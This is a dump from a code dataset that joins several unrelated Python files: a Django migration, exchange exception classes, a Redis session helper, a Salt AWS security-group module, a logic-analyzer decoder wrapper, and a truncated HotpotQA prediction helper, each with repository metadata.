('name_unit', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='MaterialSchemeProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('provider_distance', models.IntegerField()),
('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.ConstructionSystem')),
('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')),
('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')),
('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')),
('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')),
],
),
]
| 43.039474
| 148
| 0.578416
|
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ConstructionSystem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_construction_system', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Material',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_material', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Origin',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_origin', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_project', models.CharField(max_length=255)),
('use', models.CharField(max_length=255)),
('builded_surface', models.IntegerField()),
('living_area', models.IntegerField()),
('tier', models.IntegerField()),
('useful_life', models.IntegerField()),
],
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_section', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Unit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_unit', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='MaterialSchemeProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('provider_distance', models.IntegerField()),
('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.ConstructionSystem')),
('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')),
('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')),
('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')),
('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')),
],
),
]
| true
| true
|
f705e1ac415f1541823e90e5a27d3686709724a5
| 370
|
py
|
Python
|
cryptoxlib/clients/aax/exceptions.py
|
PetrZufan/cryptoxlib-aio
|
8fbb817ee7a7a88693804e24877863370d1d53c7
|
[
"MIT"
] | 90
|
2020-04-09T18:34:49.000Z
|
2022-03-09T14:29:32.000Z
|
cryptoxlib/clients/aax/exceptions.py
|
PetrZufan/cryptoxlib-aio
|
8fbb817ee7a7a88693804e24877863370d1d53c7
|
[
"MIT"
] | 44
|
2020-04-03T17:02:20.000Z
|
2022-01-29T14:51:51.000Z
|
cryptoxlib/clients/aax/exceptions.py
|
PetrZufan/cryptoxlib-aio
|
8fbb817ee7a7a88693804e24877863370d1d53c7
|
[
"MIT"
] | 28
|
2020-04-25T21:34:53.000Z
|
2022-03-31T07:20:07.000Z
|
from typing import Optional
from cryptoxlib.exceptions import CryptoXLibException
class AAXException(CryptoXLibException):
pass
class AAXRestException(AAXException):
def __init__(self, status_code: int, body: Optional[dict]):
super().__init__(f"Rest API exception: status [{status_code}], response [{body}]")
self.status_code = status_code
self.body = body
| 24.666667
| 84
| 0.778378
|
from typing import Optional
from cryptoxlib.exceptions import CryptoXLibException
class AAXException(CryptoXLibException):
pass
class AAXRestException(AAXException):
def __init__(self, status_code: int, body: Optional[dict]):
super().__init__(f"Rest API exception: status [{status_code}], response [{body}]")
self.status_code = status_code
self.body = body
| true
| true
|
f705e31f80b4e24a70351eb21bb89c4f68671a24
| 1,229
|
py
|
Python
|
service_api/domain/redis.py
|
123456789-dnipro/hackaton
|
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
|
[
"MIT"
] | null | null | null |
service_api/domain/redis.py
|
123456789-dnipro/hackaton
|
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
|
[
"MIT"
] | 1
|
2021-06-01T23:53:20.000Z
|
2021-06-01T23:53:20.000Z
|
service_api/domain/redis.py
|
123456789-dnipro/hackaton
|
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
|
[
"MIT"
] | null | null | null |
import aioredis
from sanic import Sanic
class RedisWorker:
def __init__(self):
self.__host = None
self.__pool = None
async def init(self, app: Sanic):
self.__host = app.config.REDIS_HOST
self.__pool = await aioredis.create_redis(self.__host)
async def check_session(self, token):
return await self.__pool.expire(token, 300)
async def set_conf_msg(self, phone, msg):
await self.__pool.set(phone, msg)
await self.__pool.expire(phone, 60)
async def get_conf_msg(self, phone, msg):
real_code = self.__pool.get(phone)
if real_code == msg:
self.__pool.delete(phone)
return True
else:
return False
async def get_user(self, token):
return await self.__pool.get(token)
async def create_session(self, user_id, token):
cur_token = await self.__pool.get(user_id)
if not cur_token:
await self.__pool.set(token, user_id)
await self.__pool.expire(token, 300)
else:
token = cur_token
return token
async def close(self):
self.__pool.close()
await self.__pool.wait_closed()
redis = RedisWorker()
| 26.148936
| 62
| 0.62083
|
import aioredis
from sanic import Sanic
class RedisWorker:
def __init__(self):
self.__host = None
self.__pool = None
async def init(self, app: Sanic):
self.__host = app.config.REDIS_HOST
self.__pool = await aioredis.create_redis(self.__host)
async def check_session(self, token):
return await self.__pool.expire(token, 300)
async def set_conf_msg(self, phone, msg):
await self.__pool.set(phone, msg)
await self.__pool.expire(phone, 60)
async def get_conf_msg(self, phone, msg):
real_code = self.__pool.get(phone)
if real_code == msg:
self.__pool.delete(phone)
return True
else:
return False
async def get_user(self, token):
return await self.__pool.get(token)
async def create_session(self, user_id, token):
cur_token = await self.__pool.get(user_id)
if not cur_token:
await self.__pool.set(token, user_id)
await self.__pool.expire(token, 300)
else:
token = cur_token
return token
async def close(self):
self.__pool.close()
await self.__pool.wait_closed()
redis = RedisWorker()
| true
| true
|
f705e3f0d1abe21f5b92ea10cdd8b37a2a9906b1
| 15,509
|
py
|
Python
|
salt/modules/boto_secgroup.py
|
Achimh3011/salt
|
b6e6968c22f840df0d43bea7e99c188c623b850b
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/boto_secgroup.py
|
Achimh3011/salt
|
b6e6968c22f840df0d43bea7e99c188c623b850b
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/boto_secgroup.py
|
Achimh3011/salt
|
b6e6968c22f840df0d43bea7e99c188c623b850b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Connection module for Amazon Security Groups
.. versionadded:: 2014.7.0
:configuration: This module accepts explicit ec2 credentials but can
also utilize IAM roles assigned to the instance trough Instance Profiles.
Dynamic credentials are then automatically obtained from AWS API and no
further configuration is necessary. More Information available at::
http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html
If IAM roles are not used you need to specify them either in a pillar or
in the minion's config file::
secgroup.keyid: GKTADJGHEIQSXMKKRBJ08H
secgroup.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
A region may also be specified in the configuration::
secgroup.region: us-east-1
If a region is not specified, the default is us-east-1.
It's also possible to specify key, keyid and region via a profile, either
as a passed in dict, or as a string to pull from pillars or minion config:
myprofile:
keyid: GKTADJGHEIQSXMKKRBJ08H
key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
:depends: boto
'''
from __future__ import absolute_import
# Import Python libs
import logging
import re
from distutils.version import LooseVersion as _LooseVersion
import six
log = logging.getLogger(__name__)
# Import third party libs
try:
import boto
import boto.ec2
logging.getLogger('boto').setLevel(logging.CRITICAL)
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from six import string_types
import salt.utils.odict as odict
def __virtual__():
'''
Only load if boto libraries exist and if boto libraries are greater than
a given version.
'''
required_boto_version = '2.4.0'
# Boto < 2.4.0 GroupOrCIDR objects have different attributes than
# Boto >= 2.4.0 GroupOrCIDR objects
# Differences include no group_id attribute in Boto < 2.4.0 and returning
# a groupId attribute when a GroupOrCIDR object authorizes an IP range
# Support for Boto < 2.4.0 can be added if needed
if not HAS_BOTO:
return False
elif _LooseVersion(boto.__version__) < _LooseVersion(required_boto_version):
return False
else:
return True
def exists(name=None, region=None, key=None, keyid=None, profile=None,
vpc_id=None, group_id=None):
'''
Check to see if an security group exists.
CLI example::
salt myminion boto_secgroup.exists mysecgroup
'''
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
return True
else:
return False
def _split_rules(rules):
'''
Split rules with combined grants into individual rules.
Amazon returns a set of rules with the same protocol, from and to ports
together as a single rule with a set of grants. Authorizing and revoking
rules, however, is done as a split set of rules. This function splits the
rules up.
'''
split = []
for rule in rules:
ip_protocol = rule.get('ip_protocol')
to_port = rule.get('to_port')
from_port = rule.get('from_port')
grants = rule.get('grants')
for grant in grants:
_rule = {'ip_protocol': ip_protocol,
'to_port': to_port,
'from_port': from_port}
for key, val in six.iteritems(grant):
_rule[key] = val
split.append(_rule)
return split
def _get_group(conn, name=None, vpc_id=None, group_id=None, region=None):
'''
Get a group object given a name, name and vpc_id or group_id. Return a
boto.ec2.securitygroup.SecurityGroup object if the group is found, else
return None.
'''
if name:
if vpc_id is None:
log.debug('getting group for {0}'.format(name))
group_filter = {'group-name': name}
filtered_groups = conn.get_all_security_groups(filters=group_filter)
# security groups can have the same name if groups exist in both
# EC2-Classic and EC2-VPC
# iterate through groups to ensure we return the EC2-Classic
# security group
for group in filtered_groups:
# a group in EC2-Classic will have vpc_id set to None
if group.vpc_id is None:
return group
return None
elif vpc_id:
log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id))
group_filter = {'group-name': name, 'vpc_id': vpc_id}
filtered_groups = conn.get_all_security_groups(filters=group_filter)
if len(filtered_groups) == 1:
return filtered_groups[0]
else:
return None
else:
return None
elif group_id:
try:
groups = conn.get_all_security_groups(group_ids=[group_id])
except boto.exception.BotoServerError as e:
log.debug(e)
return None
if len(groups) == 1:
return groups[0]
else:
return None
else:
return None
def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None):
'''
Get a Group ID given a Group Name or Group Name and VPC ID
CLI example::
salt myminion boto_secgroup.get_group_id mysecgroup
'''
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, region)
if group:
return group.id
else:
return False
def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None,
profile=None):
'''
Given a list of security groups and a vpc_id, convert_to_group_ids will
convert all list items in the given list to security group ids.
CLI example::
salt myminion boto_secgroup.convert_to_group_ids mysecgroup vpc-89yhh7h
'''
log.debug('security group contents {0} pre-conversion'.format(groups))
group_ids = []
for group in groups:
if re.match('sg-.*', group):
log.debug('group {0} is a group id. get_group_id not called.'
.format(group))
group_ids.append(group)
else:
log.debug('calling boto_secgroup.get_group_id for'
' group name {0}'.format(group))
group_id = get_group_id(group, vpc_id, region, key, keyid, profile)
log.debug('group name {0} has group id {1}'.format(
group, group_id)
)
group_ids.append(str(group_id))
log.debug('security group contents {0} post-conversion'.format(group_ids))
return group_ids
def get_config(name=None, group_id=None, region=None, key=None, keyid=None,
profile=None, vpc_id=None):
'''
Get the configuration for a security group.
CLI example::
salt myminion boto_secgroup.get_config mysecgroup
'''
conn = _get_conn(region, key, keyid, profile)
if not conn:
return None
sg = _get_group(conn, name, vpc_id, group_id, region)
if sg:
ret = odict.OrderedDict()
ret['name'] = sg.name
# TODO: add support for vpc_id in return
# ret['vpc_id'] = sg.vpc_id
ret['group_id'] = sg.id
ret['owner_id'] = sg.owner_id
ret['description'] = sg.description
# TODO: add support for tags
_rules = []
for rule in sg.rules:
log.debug('examining rule {0} for group {1}'.format(rule, sg.id))
attrs = ['ip_protocol', 'from_port', 'to_port', 'grants']
_rule = odict.OrderedDict()
for attr in attrs:
val = getattr(rule, attr)
if not val:
continue
if attr == 'grants':
_grants = []
for grant in val:
log.debug('examining grant {0} for'.format(grant))
g_attrs = {'name': 'source_group_name',
'owner_id': 'source_group_owner_id',
'group_id': 'source_group_group_id',
'cidr_ip': 'cidr_ip'}
_grant = odict.OrderedDict()
for g_attr, g_attr_map in six.iteritems(g_attrs):
g_val = getattr(grant, g_attr)
if not g_val:
continue
_grant[g_attr_map] = g_val
_grants.append(_grant)
_rule['grants'] = _grants
elif attr == 'from_port':
_rule[attr] = int(val)
elif attr == 'to_port':
_rule[attr] = int(val)
else:
_rule[attr] = val
_rules.append(_rule)
ret['rules'] = _split_rules(_rules)
return ret
else:
return None
def create(name, description, vpc_id=None, region=None, key=None, keyid=None,
profile=None):
'''
Create an autoscale group.
CLI example::
salt myminion boto_secgroup.create mysecgroup 'My Security Group'
'''
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
created = conn.create_security_group(name, description, vpc_id)
if created:
log.info('Created security group {0}.'.format(name))
return True
else:
msg = 'Failed to create security group {0}.'.format(name)
log.error(msg)
return False
def delete(name=None, group_id=None, region=None, key=None, keyid=None,
profile=None, vpc_id=None):
'''
Delete an autoscale group.
CLI example::
salt myminion boto_secgroup.delete mysecgroup
'''
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
deleted = conn.delete_security_group(group_id=group.id)
if deleted:
log.info('Deleted security group {0} with id {1}.'.format(group.name,
group.id))
return True
else:
msg = 'Failed to delete security group {0}.'.format(name)
log.error(msg)
return False
else:
log.debug('Security group not found.')
return False
def authorize(name=None, source_group_name=None,
source_group_owner_id=None, ip_protocol=None,
from_port=None, to_port=None, cidr_ip=None, group_id=None,
source_group_group_id=None, region=None, key=None,
keyid=None, profile=None, vpc_id=None):
'''
Add a new rule to an existing security group.
CLI example::
salt myminion boto_secgroup.authorize mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='['10.0.0.0/8', '192.168.0.0/24']'
'''
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
try:
added = conn.authorize_security_group(
src_security_group_name=source_group_name,
src_security_group_owner_id=source_group_owner_id,
ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
cidr_ip=cidr_ip, group_id=group.id,
src_security_group_group_id=source_group_group_id)
if added:
log.info('Added rule to security group {0} with id {1}'
.format(group.name, group.id))
return True
else:
msg = ('Failed to add rule to security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
except boto.exception.EC2ResponseError as e:
log.debug(e)
msg = ('Failed to add rule to security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
else:
log.debug('Failed to add rule to security group.')
return False
def revoke(name=None, source_group_name=None,
source_group_owner_id=None, ip_protocol=None,
from_port=None, to_port=None, cidr_ip=None, group_id=None,
source_group_group_id=None, region=None, key=None,
keyid=None, profile=None, vpc_id=None):
'''
Remove a rule from an existing security group.
CLI example::
salt myminion boto_secgroup.revoke mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='10.0.0.0/8'
'''
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
try:
revoked = conn.revoke_security_group(
src_security_group_name=source_group_name,
src_security_group_owner_id=source_group_owner_id,
ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
cidr_ip=cidr_ip, group_id=group.id,
src_security_group_group_id=source_group_group_id)
if revoked:
log.info('Removed rule from security group {0} with id {1}.'
.format(group.name, group.id))
return True
else:
msg = ('Failed to remove rule from security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
except boto.exception.EC2ResponseError as e:
log.debug(e)
msg = ('Failed to remove rule from security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
else:
log.debug('Failed to remove rule from security group.')
return False
def _get_conn(region, key, keyid, profile):
'''
Get a boto connection to ec2.
'''
if profile:
if isinstance(profile, string_types):
_profile = __salt__['config.option'](profile)
elif isinstance(profile, dict):
_profile = profile
key = _profile.get('key', None)
keyid = _profile.get('keyid', None)
region = _profile.get('region', None)
if not region and __salt__['config.option']('secgroup.region'):
region = __salt__['config.option']('secgroup.region')
if not region:
region = 'us-east-1'
if not key and __salt__['config.option']('secgroup.key'):
key = __salt__['config.option']('secgroup.key')
if not keyid and __salt__['config.option']('secgroup.keyid'):
keyid = __salt__['config.option']('secgroup.keyid')
try:
conn = boto.ec2.connect_to_region(region, aws_access_key_id=keyid,
aws_secret_access_key=key)
except boto.exception.NoAuthHandlerFound:
log.error('No authentication credentials found when attempting to'
' make ec2 connection for security groups.')
return None
return conn
| 35.009029
| 139
| 0.59488
|
from __future__ import absolute_import
import logging
import re
from distutils.version import LooseVersion as _LooseVersion
import six
log = logging.getLogger(__name__)
try:
import boto
import boto.ec2
logging.getLogger('boto').setLevel(logging.CRITICAL)
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from six import string_types
import salt.utils.odict as odict
def __virtual__():
required_boto_version = '2.4.0'
if not HAS_BOTO:
return False
elif _LooseVersion(boto.__version__) < _LooseVersion(required_boto_version):
return False
else:
return True
def exists(name=None, region=None, key=None, keyid=None, profile=None,
vpc_id=None, group_id=None):
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
return True
else:
return False
def _split_rules(rules):
split = []
for rule in rules:
ip_protocol = rule.get('ip_protocol')
to_port = rule.get('to_port')
from_port = rule.get('from_port')
grants = rule.get('grants')
for grant in grants:
_rule = {'ip_protocol': ip_protocol,
'to_port': to_port,
'from_port': from_port}
for key, val in six.iteritems(grant):
_rule[key] = val
split.append(_rule)
return split
def _get_group(conn, name=None, vpc_id=None, group_id=None, region=None):
if name:
if vpc_id is None:
log.debug('getting group for {0}'.format(name))
group_filter = {'group-name': name}
filtered_groups = conn.get_all_security_groups(filters=group_filter)
for group in filtered_groups:
if group.vpc_id is None:
return group
return None
elif vpc_id:
log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id))
group_filter = {'group-name': name, 'vpc_id': vpc_id}
filtered_groups = conn.get_all_security_groups(filters=group_filter)
if len(filtered_groups) == 1:
return filtered_groups[0]
else:
return None
else:
return None
elif group_id:
try:
groups = conn.get_all_security_groups(group_ids=[group_id])
except boto.exception.BotoServerError as e:
log.debug(e)
return None
if len(groups) == 1:
return groups[0]
else:
return None
else:
return None
def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None):
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, region)
if group:
return group.id
else:
return False
def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None,
profile=None):
log.debug('security group contents {0} pre-conversion'.format(groups))
group_ids = []
for group in groups:
if re.match('sg-.*', group):
log.debug('group {0} is a group id. get_group_id not called.'
.format(group))
group_ids.append(group)
else:
log.debug('calling boto_secgroup.get_group_id for'
' group name {0}'.format(group))
group_id = get_group_id(group, vpc_id, region, key, keyid, profile)
log.debug('group name {0} has group id {1}'.format(
group, group_id)
)
group_ids.append(str(group_id))
log.debug('security group contents {0} post-conversion'.format(group_ids))
return group_ids
def get_config(name=None, group_id=None, region=None, key=None, keyid=None,
profile=None, vpc_id=None):
conn = _get_conn(region, key, keyid, profile)
if not conn:
return None
sg = _get_group(conn, name, vpc_id, group_id, region)
if sg:
ret = odict.OrderedDict()
ret['name'] = sg.name
ret['group_id'] = sg.id
ret['owner_id'] = sg.owner_id
ret['description'] = sg.description
_rules = []
for rule in sg.rules:
log.debug('examining rule {0} for group {1}'.format(rule, sg.id))
attrs = ['ip_protocol', 'from_port', 'to_port', 'grants']
_rule = odict.OrderedDict()
for attr in attrs:
val = getattr(rule, attr)
if not val:
continue
if attr == 'grants':
_grants = []
for grant in val:
log.debug('examining grant {0} for'.format(grant))
g_attrs = {'name': 'source_group_name',
'owner_id': 'source_group_owner_id',
'group_id': 'source_group_group_id',
'cidr_ip': 'cidr_ip'}
_grant = odict.OrderedDict()
for g_attr, g_attr_map in six.iteritems(g_attrs):
g_val = getattr(grant, g_attr)
if not g_val:
continue
_grant[g_attr_map] = g_val
_grants.append(_grant)
_rule['grants'] = _grants
elif attr == 'from_port':
_rule[attr] = int(val)
elif attr == 'to_port':
_rule[attr] = int(val)
else:
_rule[attr] = val
_rules.append(_rule)
ret['rules'] = _split_rules(_rules)
return ret
else:
return None
def create(name, description, vpc_id=None, region=None, key=None, keyid=None,
profile=None):
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
created = conn.create_security_group(name, description, vpc_id)
if created:
log.info('Created security group {0}.'.format(name))
return True
else:
msg = 'Failed to create security group {0}.'.format(name)
log.error(msg)
return False
def delete(name=None, group_id=None, region=None, key=None, keyid=None,
profile=None, vpc_id=None):
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
deleted = conn.delete_security_group(group_id=group.id)
if deleted:
log.info('Deleted security group {0} with id {1}.'.format(group.name,
group.id))
return True
else:
msg = 'Failed to delete security group {0}.'.format(name)
log.error(msg)
return False
else:
log.debug('Security group not found.')
return False
def authorize(name=None, source_group_name=None,
source_group_owner_id=None, ip_protocol=None,
from_port=None, to_port=None, cidr_ip=None, group_id=None,
source_group_group_id=None, region=None, key=None,
keyid=None, profile=None, vpc_id=None):
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
try:
added = conn.authorize_security_group(
src_security_group_name=source_group_name,
src_security_group_owner_id=source_group_owner_id,
ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
cidr_ip=cidr_ip, group_id=group.id,
src_security_group_group_id=source_group_group_id)
if added:
log.info('Added rule to security group {0} with id {1}'
.format(group.name, group.id))
return True
else:
msg = ('Failed to add rule to security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
except boto.exception.EC2ResponseError as e:
log.debug(e)
msg = ('Failed to add rule to security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
else:
log.debug('Failed to add rule to security group.')
return False
def revoke(name=None, source_group_name=None,
source_group_owner_id=None, ip_protocol=None,
from_port=None, to_port=None, cidr_ip=None, group_id=None,
source_group_group_id=None, region=None, key=None,
keyid=None, profile=None, vpc_id=None):
conn = _get_conn(region, key, keyid, profile)
if not conn:
return False
group = _get_group(conn, name, vpc_id, group_id, region)
if group:
try:
revoked = conn.revoke_security_group(
src_security_group_name=source_group_name,
src_security_group_owner_id=source_group_owner_id,
ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
cidr_ip=cidr_ip, group_id=group.id,
src_security_group_group_id=source_group_group_id)
if revoked:
log.info('Removed rule from security group {0} with id {1}.'
.format(group.name, group.id))
return True
else:
msg = ('Failed to remove rule from security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
except boto.exception.EC2ResponseError as e:
log.debug(e)
msg = ('Failed to remove rule from security group {0} with id {1}.'
.format(group.name, group.id))
log.error(msg)
return False
else:
log.debug('Failed to remove rule from security group.')
return False
def _get_conn(region, key, keyid, profile):
if profile:
if isinstance(profile, string_types):
_profile = __salt__['config.option'](profile)
elif isinstance(profile, dict):
_profile = profile
key = _profile.get('key', None)
keyid = _profile.get('keyid', None)
region = _profile.get('region', None)
if not region and __salt__['config.option']('secgroup.region'):
region = __salt__['config.option']('secgroup.region')
if not region:
region = 'us-east-1'
if not key and __salt__['config.option']('secgroup.key'):
key = __salt__['config.option']('secgroup.key')
if not keyid and __salt__['config.option']('secgroup.keyid'):
keyid = __salt__['config.option']('secgroup.keyid')
try:
conn = boto.ec2.connect_to_region(region, aws_access_key_id=keyid,
aws_secret_access_key=key)
except boto.exception.NoAuthHandlerFound:
log.error('No authentication credentials found when attempting to'
' make ec2 connection for security groups.')
return None
return conn
| true
| true
|
f705e5539327770cb56ee6c0a5e5510efbddda11
| 1,677
|
py
|
Python
|
logic2_analyzers/DS1307/Hla.py
|
martonmiklos/sigrokdecoders_to_logic2_analyzers
|
9dd9b9a610c17e6ae525829c9112d11a80d016e7
|
[
"MIT"
] | 5
|
2020-04-15T20:45:06.000Z
|
2020-05-31T02:45:21.000Z
|
logic2_analyzers/DS1307/Hla.py
|
martonmiklos/sigrokdecoders_to_logic2_analyzers
|
9dd9b9a610c17e6ae525829c9112d11a80d016e7
|
[
"MIT"
] | 1
|
2020-07-15T09:23:05.000Z
|
2020-07-15T10:04:48.000Z
|
logic2_analyzers/DS1307/Hla.py
|
martonmiklos/sigrokdecoders_to_logic2_analyzers
|
9dd9b9a610c17e6ae525829c9112d11a80d016e7
|
[
"MIT"
] | 1
|
2020-04-20T18:49:36.000Z
|
2020-04-20T18:49:36.000Z
|
import sys
sys.path.insert(0, "../") # our fake sigrokdecode lives one dir upper
from pd import Decoder
class DS1307():
def __init__(self):
self.sigrokDecoder = Decoder()
def get_capabilities(self):
settings = {}
for option in self.sigrokDecoder.options :
settingType = ''
choices = []
if ("values" not in option) :
# TODO sigrok docs does not mention that default is mandatory
if (isinstance(option['default'], str)) :
settingType = 'string'
elif (isinstance(option['default'], int) or isinstance(option['default'], float)) :
settingType = 'number'
else :
print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default'])
settings[option["desc"]] = {
'type': settingType
}
if ("values" in option) :
settings[option["desc"]]['choices'] = option["values"]
return {
'settings': settings
}
def set_settings(self, settings):
# TODO handle the settings
# convert sigrok's
# annotations = (
# ('warning', 'Warning'),
# ....
#
# format annotations to Logic's format
self.sigrokDecoder.reset()
resultTypes = {}
for annotation in self.sigrokDecoder.annotations :
resultTypes[annotation[0]] = annotation[1] + "{{data.data}}"
return {
"result_types": resultTypes
}
def decode(self, data):
self.sigrokDecoder.processI2C(data)
if (not self.packet == {}) :
ret = self.generate_logic_result()
self.packet = {}
return ret
| 29.421053
| 137
| 0.57901
|
import sys
sys.path.insert(0, "../")
from pd import Decoder
class DS1307():
def __init__(self):
self.sigrokDecoder = Decoder()
def get_capabilities(self):
settings = {}
for option in self.sigrokDecoder.options :
settingType = ''
choices = []
if ("values" not in option) :
if (isinstance(option['default'], str)) :
settingType = 'string'
elif (isinstance(option['default'], int) or isinstance(option['default'], float)) :
settingType = 'number'
else :
print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default'])
settings[option["desc"]] = {
'type': settingType
}
if ("values" in option) :
settings[option["desc"]]['choices'] = option["values"]
return {
'settings': settings
}
def set_settings(self, settings):
# TODO handle the settings
# convert sigrok's
self.sigrokDecoder.reset()
resultTypes = {}
for annotation in self.sigrokDecoder.annotations :
resultTypes[annotation[0]] = annotation[1] + "{{data.data}}"
return {
"result_types": resultTypes
}
def decode(self, data):
self.sigrokDecoder.processI2C(data)
if (not self.packet == {}) :
ret = self.generate_logic_result()
self.packet = {}
return ret
| true
| true
|
f705e56a5a72c63a6b880ab3f1397c0082a8229a
| 4,774
|
py
|
Python
|
hotpotqa_utils_joint.py
|
Captainr22/SAE
|
f3e370604978a273eb1e1ffdbd342dee3de431c9
|
[
"MIT"
] | 38
|
2020-01-23T00:46:06.000Z
|
2022-03-13T13:10:19.000Z
|
hotpotqa_utils_joint.py
|
Captainr22/SAE
|
f3e370604978a273eb1e1ffdbd342dee3de431c9
|
[
"MIT"
] | 7
|
2020-02-02T02:05:32.000Z
|
2022-03-06T04:37:06.000Z
|
hotpotqa_utils_joint.py
|
Captainr22/SAE
|
f3e370604978a273eb1e1ffdbd342dee3de431c9
|
[
"MIT"
] | 9
|
2020-02-12T08:35:23.000Z
|
2022-02-19T07:29:26.000Z
|
import torch
import numpy as np
import json, sys, re, string
import collections
from collections import Counter
from collections import OrderedDict
def get_sp_pred(pred_sp_idx, data):
"""get the prediction of supporting facts in original format
Arguments:
pred_sp_idx {[type]} -- [description]
data {[type]} -- [description]
"""
pred = []
for p in pred_sp_idx:
if p < len(data):
pred.append([data[p].doc_title[0], data[p].sent_id])
return pred
def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length):
"""get predictions for each sample in the batch
Arguments:
batch_index {[type]} -- [description]
batch_logits {[type]} -- 0: supporting facts logits, 1: answer span logits, 2: answer type logits 3: gold doc logits
batch_size {[type]} -- [description]
predict_file {[type]} -- [description]
"""
sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy()
ans_type_logits_np = batch_logits[1].detach().cpu().numpy()
batch_index = batch_index.numpy().tolist()
sp_pred, span_pred, ans_type_pred = [], [], []
for idx, data in enumerate(batch_index):
# supporting facts prediction
pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ]
print(pred_sp_idx)
if len(pred_sp_idx) != 0:
sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data]))
else:
sp_pred.append([])
# answer type prediction, for debug purpose
ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:]))
# answer span prediction
if ans_type_pred[-1] == 0:
span_pred.append("no")
elif ans_type_pred[-1] == 1:
span_pred.append("yes")
else:
span_pred.append("")
